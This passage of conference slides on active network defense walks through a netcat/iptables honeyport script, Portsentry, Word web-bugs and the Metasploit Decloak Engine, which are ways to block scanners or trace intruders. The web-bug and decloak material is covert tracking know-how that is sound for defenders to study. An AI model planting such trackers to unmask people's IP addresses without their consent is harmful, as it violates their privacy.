• A connection only appears in netstat if something accepts it, so run a listener on 3333 (or let a scanner's full connect complete) and schedule the script. Whoever touches the port gets blocked, including your own vulnerability scanner and admin workstations, so exclude those addresses first.
• Easy copy and paste link from:
  – http://pauldotcom.com/wiki/index.php/Episode203

Page 84: Dynamic Blacklisting: Linux

```sh
# Honeyport: anything that completes a TCP connection to 2222 gets its source
# address dropped. Run as root. Needs the traditional netcat, whose -v output
# reads "connect to [x.x.x.x] from host [y.y.y.y] port", so the second [...] is the peer;
# the OpenBSD netcat prints a different line and the cut yields nothing.
while [ 1 ] ; echo "started" ; do
  IP=`nc -v -l -p 2222 2>&1 1> /dev/null | grep from | cut -d[ -f 3 | cut -d] -f 1`
  [ -n "$IP" ] && iptables -A INPUT -p tcp -s ${IP} -j DROP
done
```

• The `[ -n "$IP" ]` guard keeps an nc error from feeding an empty address to iptables. Put an ACCEPT rule for your management hosts ahead of this in the INPUT chain before you start it: whoever scans the honeyport gets blocked, including you.
• Easy copy and paste link from:
  – http://pauldotcom.com/wiki/index.php/Episode204

Page 85: Portsentry

• Does the same thing we covered in the blacklisting section
• However, it does offer more flexibility
  – Logging
  – Rerouting traffic
  – Blocking through hosts.deny
• A bit of an older tool (2003) but still surprisingly effective
• Set it up before an audit or a penetration test and make your Linux/Unix systems "go away"
• Still requires a listener (nc) on a honeyport

Page 86: Word Web-Bugs

• Very easy to use
• Supposed to be used for penetration testing
• However this tactic works great at tracking intellectual property
• Not all ways of finding attribution need to result in shell access
• Far less likely to crash a system
• Embed this code in a spreadsheet called SSN.xls and watch how fast an attacker runs the macros

Page 87: How does it Work?

• It simply inserts a reference to a CSS file or image on a web server you control
• When the doc is opened it tries to fetch that URL
• Direct connection! Your web server log now holds the opener's IP address, user agent and time

Page 88: Metasploit Decloak Engine

• Hunting back where the attackers are coming from
• This is done by having the victim/attacker connect back using a number of applications
  – Java
  – iTunes
  – Word
  – FTP
  – QuickTime
  – DNS
• By having them connect in a number of different ways with different applications we increase the odds of finding their "real" IP address: a proxy or VPN that covers the browser often does not cover every helper application or its DNS lookups

Page 89: Running the Decloak Engine

Page 90: Results

Page 91: Implementing the Decloak Engine

• You can use their servers
  – Generate an MD5 string based on the attacker/victim's information
  – Embed an iframe directing them to the decloak site
  – Recover the information gathered from decloak.net
• You can also implement their APIs on your servers
  – Implement a custom DNS server
  – Create a database for the results
  – Embed the Java and Flash applications from decloak.net

Page 92: SANS Denver!!! June 25-30

• http://www.sans.org/rocky-mountain-2011/
• SANS Security Essentials Bootcamp Style
• Management 414: SANS +S™ Training Program for the CISSP® Certification Exam
  – ISACA10 = 10% off
• Management 512: SANS Security Leadership Essentials For Managers
• Security 504: Hacker Techniques, Exploits & Incident Handling
• Security 505: Securing Windows
• Developer 522: Defending Web Applications Security Essentials
• Forensics 558: Network Forensics

Page 93: John's Contact Information

• Twitter: strandjs
• www.blackhillsinfosec.com
• www.pauldotcom.com
• 303-710-1171
• 605-550-0724